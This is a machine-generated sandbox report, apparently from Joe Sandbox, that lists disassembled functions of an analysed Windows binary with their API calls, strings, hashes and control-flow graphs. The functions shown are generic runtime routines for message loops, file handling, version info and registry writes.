                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G-:
                                                                                                                      • API String ID: 0-1823654154
                                                                                                                      • Opcode ID: 06d3c8224044b3a1b26256545333fe9e8c27fb292b32995d736aecbc3a48f36b
                                                                                                                      • Instruction ID: 30d9d192c33185b8d27b230e8d6202585b435263ac66e52735fd64c14870fc39
                                                                                                                      • Opcode Fuzzy Hash: 06d3c8224044b3a1b26256545333fe9e8c27fb292b32995d736aecbc3a48f36b
                                                                                                                      • Instruction Fuzzy Hash: A322CD74900216CFDB26DF58C490BAAF7F0FF1A300F14816AE85A9B791E775AD81CB91
                                                                                                                      Function 003BDD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNEL32(003AC848,003AC848), ref: 003BDDA2
                                                                                                                      • FindFirstFileW.KERNEL32(003AC848,?), ref: 00414A83
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesFindFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4185537391-0
                                                                                                                      • Opcode ID: 1e29815f98b5b5013b5af94b9c630ecaef98f20a62c626f10ada03c8a825fb7f
                                                                                                                      • Instruction ID: 174603b7f9d34fcd39eeb7269f2472ccdc8acb19031413d527f64d69ceb1de32
                                                                                                                      • Opcode Fuzzy Hash: 1e29815f98b5b5013b5af94b9c630ecaef98f20a62c626f10ada03c8a825fb7f
                                                                                                                      • Instruction Fuzzy Hash: 16E0D8329145015B42246778DC0D8FA375C9E4533DB600719F975C19E0FBB49D5186DE
                                                                                                                      Function 003B3680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3964851224-0
                                                                                                                      • Opcode ID: fca7554af4863021a4d7accbd57c4e02939826a0cdfd6ebbd50f73e0017f5055
                                                                                                                      • Instruction ID: 3119013de0486be97a5a804ff08c7b356cccc772393fc38adab49f172fefa64b
                                                                                                                      • Opcode Fuzzy Hash: fca7554af4863021a4d7accbd57c4e02939826a0cdfd6ebbd50f73e0017f5055
                                                                                                                      • Instruction Fuzzy Hash: 36928C706083419FD725DF18C480BAAB7E4FF84308F14895EEA8A8B792D775ED85CB52
                                                                                                                      Function 0041C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2645101109-0
                                                                                                                      • Opcode ID: 66dad68731539bc9f0479ac1e574d0e445e8915906c4ff259c93332d5e1a9446
                                                                                                                      • Instruction ID: 9cba251e831fba2db85e026a5ccd1c8536b8e2d833e2713f9c9300ac35259d19
                                                                                                                      • Opcode Fuzzy Hash: 66dad68731539bc9f0479ac1e574d0e445e8915906c4ff259c93332d5e1a9446
                                                                                                                      • Instruction Fuzzy Hash: 22C04CB180400DDFC715CF80C9459EFB7BCBB08304F104096A215E2010D7749B469B7A
                                                                                                                      Function 003AE1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003AE279
                                                                                                                      • timeGetTime.WINMM ref: 003AE51A
                                                                                                                      • TranslateMessage.USER32(?), ref: 003AE646
                                                                                                                      • DispatchMessageW.USER32(?), ref: 003AE651
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003AE664
                                                                                                                      • LockWindowUpdate.USER32(00000000), ref: 003AE697
                                                                                                                      • DestroyWindow.USER32 ref: 003AE6A3
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003AE6BD
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00415B15
                                                                                                                      • TranslateMessage.USER32(?), ref: 004162AF
                                                                                                                      • DispatchMessageW.USER32(?), ref: 004162BD
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004162D1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                      • API String ID: 2641332412-570651680
                                                                                                                      • Opcode ID: 6257f9e2a1737929b7bb4b618cbaf5406759bbd90d990a3aae93aa573193e02e
                                                                                                                      • Instruction ID: d7a5f54a1a3117fc804e11c8339982e24ffd7e322ba7c92a3c106f23f903c679
                                                                                                                      • Opcode Fuzzy Hash: 6257f9e2a1737929b7bb4b618cbaf5406759bbd90d990a3aae93aa573193e02e
                                                                                                                      • Instruction Fuzzy Hash: 8762C170604340DFDB26DF64C895BAA77E8EF46304F08497EE9468B2A2D7B4D884CB56
                                                                                                                      Function 003D6A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ___createFile.LIBCMT ref: 003D6C73
                                                                                                                      • ___createFile.LIBCMT ref: 003D6CB4
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003D6CDD
                                                                                                                      • __dosmaperr.LIBCMT ref: 003D6CE4
                                                                                                                      • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003D6CF7
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003D6D1A
                                                                                                                      • __dosmaperr.LIBCMT ref: 003D6D23
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003D6D2C
                                                                                                                      • __set_osfhnd.LIBCMT ref: 003D6D5C
                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 003D6DC6
                                                                                                                      • __close_nolock.LIBCMT ref: 003D6DEC
                                                                                                                      • __chsize_nolock.LIBCMT ref: 003D6E1C
                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 003D6E2E
                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 003D6F26
                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 003D6F3B
                                                                                                                      • __close_nolock.LIBCMT ref: 003D6F9B
                                                                                                                        • Part of subcall function 003CF84C: CloseHandle.KERNEL32(00000000,0044EEC4,00000000,?,003D6DF1,0044EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003CF89C
                                                                                                                        • Part of subcall function 003CF84C: GetLastError.KERNEL32(?,003D6DF1,0044EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003CF8A6
                                                                                                                        • Part of subcall function 003CF84C: __free_osfhnd.LIBCMT ref: 003CF8B3
                                                                                                                        • Part of subcall function 003CF84C: __dosmaperr.LIBCMT ref: 003CF8D5
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 003D6FBD
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003D70F2
                                                                                                                      • ___createFile.LIBCMT ref: 003D7111
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003D711E
                                                                                                                      • __dosmaperr.LIBCMT ref: 003D7125
                                                                                                                      • __free_osfhnd.LIBCMT ref: 003D7145
                                                                                                                      • __invoke_watson.LIBCMT ref: 003D7173
                                                                                                                      • __wsopen_helper.LIBCMT ref: 003D718D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                      • String ID: 9A<$@
                                                                                                                      • API String ID: 3896587723-3825118832
                                                                                                                      • Opcode ID: fb1eafeb12e901aecfed9e20b7c230bd69a369ce412db87c2a29dcbc9ba33516
                                                                                                                      • Instruction ID: 08e148efc4d813765c6224c0f7cbab24a7bc4e27f7db8e850190823910f2ef4b
                                                                                                                      • Opcode Fuzzy Hash: fb1eafeb12e901aecfed9e20b7c230bd69a369ce412db87c2a29dcbc9ba33516
                                                                                                                      • Instruction Fuzzy Hash: AE2201739042059BEB279F68FC52BAE7B65EB04320F25422BE961EB3D2D7358D40CB51
                                                                                                                      Function 003E76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 003E76ED
                                                                                                                      • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 003E7713
                                                                                                                      • _wcscpy.LIBCMT ref: 003E7741
                                                                                                                      • _wcscmp.LIBCMT ref: 003E774C
                                                                                                                      • _wcscat.LIBCMT ref: 003E7762
                                                                                                                      • _wcsstr.LIBCMT ref: 003E776D
                                                                                                                      • 75381560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003E7789
                                                                                                                      • _wcscat.LIBCMT ref: 003E77D2
                                                                                                                      • _wcscat.LIBCMT ref: 003E77D9
                                                                                                                      • _wcsncpy.LIBCMT ref: 003E7804
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat$FileInfoVersion$75381560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                      • API String ID: 2589663703-1459072770
                                                                                                                      • Opcode ID: 69a1139731dba61ef60e764435f8a66bfef0c64cc07f5bd17dda1bcea136167d
                                                                                                                      • Instruction ID: 72fd9a9f5d03627feedf4fdc36d1f70c0a513c8571a2f112d094a82d93c70a62
                                                                                                                      • Opcode Fuzzy Hash: 69a1139731dba61ef60e764435f8a66bfef0c64cc07f5bd17dda1bcea136167d
                                                                                                                      • Instruction Fuzzy Hash: 8441F571A04210BAEB02AB659C47FBF77ACEF59710F14016AF801EA183EB749E01D7A5
                                                                                                                      Function 003A1F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 608 3a1f04-3a1f9c call 3a2d1a * 2 call 3ac935 * 2 call 3a7e53 call 3ad3d2 * 3 625 412569-412575 call 3c2626 608->625 626 3a1fa2-3a1fa6 608->626 629 41257d-412583 call 3de4ea 625->629 628 3a1fac-3a1faf 626->628 626->629 631 41258f-41259b call 3aa4f6 628->631 632 3a1fb5-3a1fb8 628->632 629->631 639 4125a1-4125b1 call 3aa4f6 631->639 640 412899-41289d 631->640 632->631 634 3a1fbe-3a1fc7 GetForegroundWindow call 3a200a 632->634 641 3a1fcc-3a1fe3 call 3a197e 634->641 639->640 653 4125b7-4125c5 639->653 644 4128ab-4128ae 640->644 645 41289f-4128a6 call 3ac935 640->645 654 3a1fe4-3a2007 call 3a5cd3 * 3 641->654 646 4128b0 644->646 647 4128b7-4128c4 644->647 645->644 646->647 651 4128d6-4128da 647->651 652 4128c6-4128d4 call 3ab8a7 CharUpperBuffW 647->652 657 4128f1-4128fa 651->657 658 4128dc-4128df 651->658 652->651 656 4125c9-4125e1 call 3dd68d 653->656 656->640 671 4125e7-4125f7 call 3bf885 656->671 664 41290b EnumWindows 657->664 665 4128fc-412909 GetDesktopWindow EnumChildWindows 657->665 658->657 663 4128e1-4128ef call 3ab8a7 CharUpperBuffW 658->663 663->657 669 412911-412930 call 3de44e call 3a2d1a 664->669 665->669 683 412940 669->683 684 412932-41293b call 3a200a 669->684 681 41287b-41288b call 3bf885 671->681 682 4125fd-41260d call 3bf885 671->682 690 412873-412876 681->690 691 41288d-412891 681->691 692 412861-412871 call 3bf885 682->692 693 412613-412623 call 3bf885 682->693 684->683 691->654 695 412897 691->695 692->690 702 412842-412848 GetForegroundWindow 692->702 700 412629-412639 call 3bf885 693->700 701 41281d-412836 call 3e88a2 IsWindow 693->701 698 412852-412858 695->698 698->692 710 412659-412669 call 3bf885 700->710 711 41263b-412640 700->711 701->654 712 41283c-412840 701->712 705 412849-412850 call 3a200a 702->705 705->698 720 41266b-412675 710->720 721 41267a-41268a call 3bf885 710->721 713 412646-412657 call 3a5cf6 711->713 714 41280d-41280f 711->714 712->705 722 41269b-4126a7 call 3a5be9 713->722 717 412817-412818 714->717 717->654 723 4127e6-4127f0 call 3ac935 720->723 730 4126b5-4126c5 call 3bf885 721->730 731 41268c-412698 call 3a5cf6 721->731 733 412811-412813 722->733 734 4126ad-4126b0 722->734 732 412804-412808 723->732 739 4126e3-4126f3 call 3bf885 730->739 740 4126c7-4126de call 3c2241 730->740 731->722 732->656 733->717 734->732 745 412711-412721 call 3bf885 739->745 746 4126f5-41270c call 3c2241 739->746 740->732 751 412723-41273a call 3c2241 745->751 752 41273f-41274f call 3bf885 745->752 746->732 751->732 757 412751-412768 call 3c2241 752->757 758 41276d-41277d call 3bf885 752->758 757->732 763 412795-4127a5 call 3bf885 758->763 764 41277f-412793 call 3c2241 758->764 769 4127c3-4127d3 call 3bf885 763->769 770 4127a7-4127b7 call 3bf885 763->770 764->732 776 4127f2-412802 call 3dd614 769->776 777 4127d5-4127da 769->777 770->690 775 4127bd-4127c1 770->775 775->732 776->690 776->732 779 412815 777->779 780 4127dc-4127e2 777->780 779->717 780->723
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • GetForegroundWindow.USER32 ref: 003A1FBE
                                                                                                                      • IsWindow.USER32(?), ref: 0041282E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Foreground_memmove
                                                                                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                      • API String ID: 3828923867-1919597938
                                                                                                                      • Opcode ID: a3b7860cd874cec67aa73d6cd4cb80bbb6661f206869787bdee6ccd8fa836665
                                                                                                                      • Instruction ID: e1d5f5d32fd76c00ebb1ca5327307eecb7ea798432f8c12d85f34c09f3e4adea
                                                                                                                      • Opcode Fuzzy Hash: a3b7860cd874cec67aa73d6cd4cb80bbb6661f206869787bdee6ccd8fa836665
                                                                                                                      • Instruction Fuzzy Hash: AAD11A30504202DFCB09EF14C980ADAB7A1FF55344F044A2FF455DB6A2DB74E9AACB96
                                                                                                                      Function 0040352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 782 40352a-403569 call 3ad3d2 * 3 789 403574-4035e7 call 3a84a6 call 403d7b call 403af7 782->789 790 40356b-40356e 782->790 804 403612-403617 789->804 805 4035e9-4035f4 call 3ed7e4 789->805 790->789 791 4035f9-40360d call 3b2570 790->791 798 403a94-403ab7 call 3a5cd3 * 3 791->798 808 403619-40362e RegConnectRegistryW 804->808 809 40366d 804->809 805->791 810 403630-403662 call 3a7ba9 call 3ed7e4 call 3b2570 808->810 811 403667-40366b 808->811 813 403671-40369c RegCreateKeyExW 809->813 810->798 811->813 816 4036e7-4036ec 813->816 817 40369e-4036d2 call 3a7ba9 call 3ed7e4 call 3b2570 813->817 819 4036f2-403715 call 3a84a6 call 3c1bc7 816->819 820 403a7b-403a8c RegCloseKey 816->820 817->798 838 4036d8-4036e2 RegCloseKey 817->838 836 403796-4037b6 call 3a84a6 call 3c1bc7 819->836 837 403717-40376d call 3a84a6 call 3c18fb call 3a84a6 * 2 RegSetValueExW 819->837 820->798 823 403a8e-403a92 RegCloseKey 820->823 823->798 847 403840-403860 call 3a84a6 call 3c1bc7 836->847 848 4037bc-403814 call 3a84a6 call 3c18fb call 3a84a6 * 2 RegSetValueExW 836->848 837->820 859 403773-403791 call 3a7ba9 call 3b2570 837->859 838->798 864 403866-4038c9 call 3a84a6 call 3c010a call 3a84a6 call 3a3b1e 847->864 865 403949-403969 call 3a84a6 call 3c1bc7 847->865 848->820 879 40381a-40383b call 3a7ba9 call 3b2570 848->879 880 403a74 859->880 899 4038e9-403918 call 3a84a6 RegSetValueExW 864->899 900 4038cb-4038d0 864->900 884 4039c6-4039e6 call 3a84a6 call 3c1bc7 865->884 885 40396b-40398b call 3acdb4 call 3a84a6 865->885 879->820 880->820 905 403a13-403a30 call 3a84a6 call 3c1bc7 884->905 906 4039e8-403a0e call 3ad00b call 3a84a6 884->906 902 40398d-4039a1 RegSetValueExW 885->902 917 40391a-403936 call 3a7ba9 call 3b2570 899->917 918 40393d-403944 call 3c017e 899->918 903 4038d2-4038d4 900->903 904 4038d8-4038db 900->904 902->820 908 4039a7-4039c1 call 3a7ba9 call 3b2570 902->908 903->904 904->900 910 4038dd-4038df 904->910 931 403a32-403a60 call 3ebe47 call 3a84a6 call 3ebe8a 905->931 932 403a67-403a71 call 3b2570 905->932 906->902 908->880 910->899 915 4038e1-4038e5 910->915 915->899 917->918 918->820 931->932 932->880
                                                                                                                      APIs
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00403626
                                                                                                                      • RegCreateKeyExW.KERNEL32(?,?,00000000,0043DBF0,00000000,?,00000000,?,?), ref: 00403694
                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004036DC
                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00403765
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00403A85
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00403A92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                      • Opcode ID: b04ee44c2fe8bd74295ec735884cc7d9d515e060292d23d57b96262e79e85d01
                                                                                                                      • Instruction ID: ca29b3ea0b625d9393b47d25efc29a5114a276eaf07d30b7cee085dd4d0195d7
                                                                                                                      • Opcode Fuzzy Hash: b04ee44c2fe8bd74295ec735884cc7d9d515e060292d23d57b96262e79e85d01
                                                                                                                      • Instruction Fuzzy Hash: D6027E756006019FCB15EF15C891E2AB7E8FF89724F04856EF88AAB3A1DB34ED01CB45
                                                                                                                      Function 003BE975 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 170COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 003BEA39
                                                                                                                      • __wsplitpath.LIBCMT ref: 003BEA56
                                                                                                                        • Part of subcall function 003C297D: __wsplitpath_helper.LIBCMT ref: 003C29BD
                                                                                                                      • _wcsncat.LIBCMT ref: 003BEA69
                                                                                                                      • __makepath.LIBCMT ref: 003BEA85
                                                                                                                        • Part of subcall function 003C2BFF: __wmakepath_s.LIBCMT ref: 003C2C13
                                                                                                                        • Part of subcall function 003C010A: std::exception::exception.LIBCMT ref: 003C013E
